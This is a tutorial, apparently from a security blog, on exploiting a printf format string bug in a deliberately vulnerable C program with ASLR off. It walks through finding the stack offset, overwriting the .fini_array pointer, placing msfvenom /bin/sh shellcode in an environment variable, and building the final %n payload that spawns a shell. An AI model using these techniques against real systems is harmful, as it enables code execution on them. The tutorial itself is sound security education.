The format string in a printf statement is responsible for significant flow control within the program, and, if attacker-controlled, can be used to exploit the application in various ways. Specifically, an attacker can read and write arbitrary memory.

Reading memory can be accomplished through the usual operators, and the GNU extension of %<x>$ allows you to jump through the stack to arbitrary positions (as a multiple of the addressing size, anyway). The %n format specifier allows to write to a memory address: the address at that point on the stack is taken as an int *, and the number of bytes output so far will be written to the address. So this allows us to write a value by outputting the number of bytes for the value we want to write.

I’ll discuss exploitation with a simple example, as you might see in a wargame.

Basic steps:

  1. Figure out where your buffer is on the stack.
  2. Figure out where you want to write.
  3. Figure out what you want to write.
  4. Put the exploit together.

Here’s what we’ll use for our sample vulnerable program. For this simple case, I’ve marked the stack executable and am using a system with ASLR disabled.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024

int main(int argc, char **argv) {
    char buf[BUF_SIZE];
    if(argc < 2) return 1;

    strncpy(buf, argv[1], BUF_SIZE-1);
    printf(buf);

    return 0;
}

Let’s figure out where our buffer is on the stack, relative to the stack of the printf call. It’s easy enough to do: supply something like AAAA%<x>$p where <x> is a position on the stack, starting from 1 and going up. When you see ‘AAAA0x41414141’ as your output, you’ve found your format string. In this case, the format string is 6 words up the stack.

So, since we can write to memory, where do we want to write? We need something that will be executed after the printf, which severely limits our options. The first option that comes to mind is to overwrite the saved EIP, but most likely we don’t know the exact address where that’s saved, and the stack can shift around quite easily (due to argument lengths, environment variables, etc.). What about something more fixed?

Linux ELF binaries contain a section known as .fini_array, which is defined as “an array of function pointers that contributes to a single termination array for the executable or shared object containing the section.” In a simple binary like this, this section contains only a single function pointer, but that’s ok, because we can overwrite this pointer to point to our shellcode. Since the binary exits almost immediately after calling printf, there’s no problem in waiting for the .fini_array pointers to be called. With objdump -h, we can see the section headers, and find our section:

1
2
3
$ objdump -h printf
 19 .fini_array   00000004  080495b0  080495b0  000005b0  2**2
                  CONTENTS, ALLOC, LOAD, DATA

As expected, it’s 4 bytes long, and located at 0x080495b0, so now we have our address to overwrite.

So what do we want to write there? Clearly the address of our shellcode. We could write our shellcode to the printf buffer, but we’d need to get that address just right, or perhaps include a large nopsled. My favorite trick is to store the shellcode in an environment variable. It’s easy to predict the address (if you don’t change the environment) by writing a small program to spit it out, and, if you don’t feel like writing your own shellcode, msfvenom will provide you with a convenient shellcode in bash form: msfvenom -p linux/x86/exec CMD=/bin/sh -f bash -b '\x00'.

So, stick your shellcode into an environment variable and get its address. So long as the environment doesn’t change, that address will remain constant for all programs invoked from that shell. In my case, I got 0xffffdef2. Because the value is sufficiently large, I’ll actually split it into two 16 bit writes, but the %n operator always writes an int at a time (32 bits), so we have to do it carefully to avoid overwriting ourselves!

Writing from lower to higher works (we’re on a little-endian system, remember!) so we write 0xdef2 to the lower address, then 0xffff to the higher address. Let’s start constructing our format string. First, we’ll need both the lowest address and the one two bytes past it, then output our first value minus 8 bytes, write it to memory, then repeat for the 2nd.

The general format at this point is: <destination address><destination address + 2>%<0xdef2 - 8>c%6$n%<0xffff-0xdef2>c%7$n

Putting it together:
./printf $'\xb0\x95\x04\x08\xb2\x95\x04\x08%57066c%6$n%8461c%7$n' sh$